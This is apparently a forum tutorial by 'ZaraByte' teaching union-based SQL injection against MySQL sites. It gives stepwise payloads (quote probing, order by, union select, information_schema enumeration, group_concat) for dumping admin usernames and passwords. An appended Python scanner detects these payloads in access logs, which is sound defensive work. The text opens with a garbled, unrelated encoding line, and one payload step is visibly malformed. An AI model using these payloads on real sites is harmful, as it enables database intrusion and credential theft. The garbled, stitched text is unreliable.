Ò׽ؽØͼÈí¼þ¡¢µ¥Îļþ¡¢Ãâ°²×°¡¢´¿ÂÌÉ«¡¢½ö160KB

[Injection] SQL Injection Against MySQL Server 5.0 and Later


by ZaraByte
How to do a SQL Injection for MySQL Server 5.0+
1. Find a vulnerable site: add a ' at the end of the URL. Example: for news.php?id=1, add a ' after the 1 and see if you get a syntax error.
2. order by #--
Keep increasing the # until you get an error.
3. union all select 1,#,#,#,#,#--
The above has 6 numbers; if the site you have shows more than 6 or fewer, you need to add or remove them.
4. Find a column # that is shown from step 2. For example, if there are 5 columns shown, you can pick column 2.
5. concat_ws(0x3A,version(),@@version) in vulnerable column
Add concat_ws(0x3A,version(),@@version) to a vulnerable column like column 2 and see if it shows the SQL version. If it doesn't, try adding a - before the id value, as in php?id=-#, and see if you get the version.
This will show the version of the SQL server; it is recommended that it be 5.0.
6. union all select 1,group_concat(table_name),#,#,#,# from information_schema.tables where table_schema=database()--
This selects all the tables from the database.
7. Find a table you're after, like admin, users or user, whatever table you want to see.
8. union all select 1,group_concat(column_name),#,#,#,# from information_schema.columns where table_name=char(x)--
Replace x with the ASCII of the table name. You will need to convert text to ASCII.
9. union all select 1,group_concat(table_name,0x3a,table_name)#,#,#,# from column_name--
Replace table_name with the table name you're after; 0x3a is hex for ":"; the second table_name would be replaced with the other table name you're after.
So for example, say you found a table named admin and you want to see the username and password columns, you'd do:
union all select 1,group_concat(username,0x3a,password,0x3c62723e)#,#,#,# from table_name--
Basically it's going to show the username, then ":" (0x3a in hex), then the password; 0x3c62723e is hex for "<br>", which puts a line break between them.
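
For defenders, each step above leaves a recognizable string in the web server's access log. The following is an added example, not part of ZaraByte's original write-up: a Python scan that tags requests by walkthrough stage and groups them per client. The log lines, addresses and stage names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# One signature per stage of the walkthrough; the stage names are this example's own.
STAGES = [
    ("quote_probe",   re.compile(r"=\s*-?\d+\s*'")),                      # step 1
    ("column_count",  re.compile(r"\border\s+by\s+\d+", re.I)),           # step 2
    ("union_select",  re.compile(r"\bunion\s+(all\s+)?select\b", re.I)),  # step 3
    ("version_probe", re.compile(r"@@version|\bversion\s*\(", re.I)),     # step 5
    ("schema_enum",   re.compile(r"\binformation_schema\.(tables|columns)\b", re.I)),  # steps 6, 8
    ("row_dump",      re.compile(r"\bgroup_concat\s*\(", re.I)),          # steps 6-9
]
# Client address and request target from a common/combined log format line.
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def classify(query):
    """Return the stage names whose signature appears in a raw query string."""
    text = unquote_plus(query)  # logs hold %20 or + where the client sent spaces
    return [name for name, rx in STAGES if rx.search(text)]

def scan(lines):
    """Map each client address to the ordered list of stages seen from it."""
    hits = {}
    for line in lines:
        m = REQUEST.match(line)
        if not m:
            continue
        client, target = m.groups()
        stages = classify(urlsplit(target).query)
        if stages:
            seen = hits.setdefault(client, [])
            seen += [s for s in stages if s not in seen]
    return hits

# Constructed access-log lines (documentation addresses, made-up sizes and times).
SAMPLE_LOG = [
    '198.51.100.23 - - [12/Mar/2009:10:01:02 +0000] "GET /news.php?id=1%27 HTTP/1.1" 500 312',
    '198.51.100.23 - - [12/Mar/2009:10:01:09 +0000] "GET /news.php?id=1+order+by+7-- HTTP/1.1" 500 298',
    '198.51.100.23 - - [12/Mar/2009:10:01:30 +0000] "GET /news.php?id=-1+union+all+select+1,concat_ws(0x3A,version(),@@version),3,4,5,6-- HTTP/1.1" 200 1460',
    '198.51.100.23 - - [12/Mar/2009:10:02:11 +0000] "GET /news.php?id=-1+UNION+ALL+SELECT+1,group_concat(table_name),3,4,5,6+from+information_schema.tables+where+table_schema=database()-- HTTP/1.1" 200 2210',
    '192.0.2.10 - - [12/Mar/2009:10:02:40 +0000] "GET /news.php?id=42 HTTP/1.1" 200 5120',
    '192.0.2.10 - - [12/Mar/2009:10:03:05 +0000] "GET /search.php?q=order+by+phone HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for client, stages in scan(SAMPLE_LOG).items():
        print(client, len(stages), stages)
```

A single client that progresses through several stages in order is a much stronger signal than any one match. The lasting fix is still on the application side: bind the id value as a typed query parameter so none of these strings ever reach the SQL parser.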

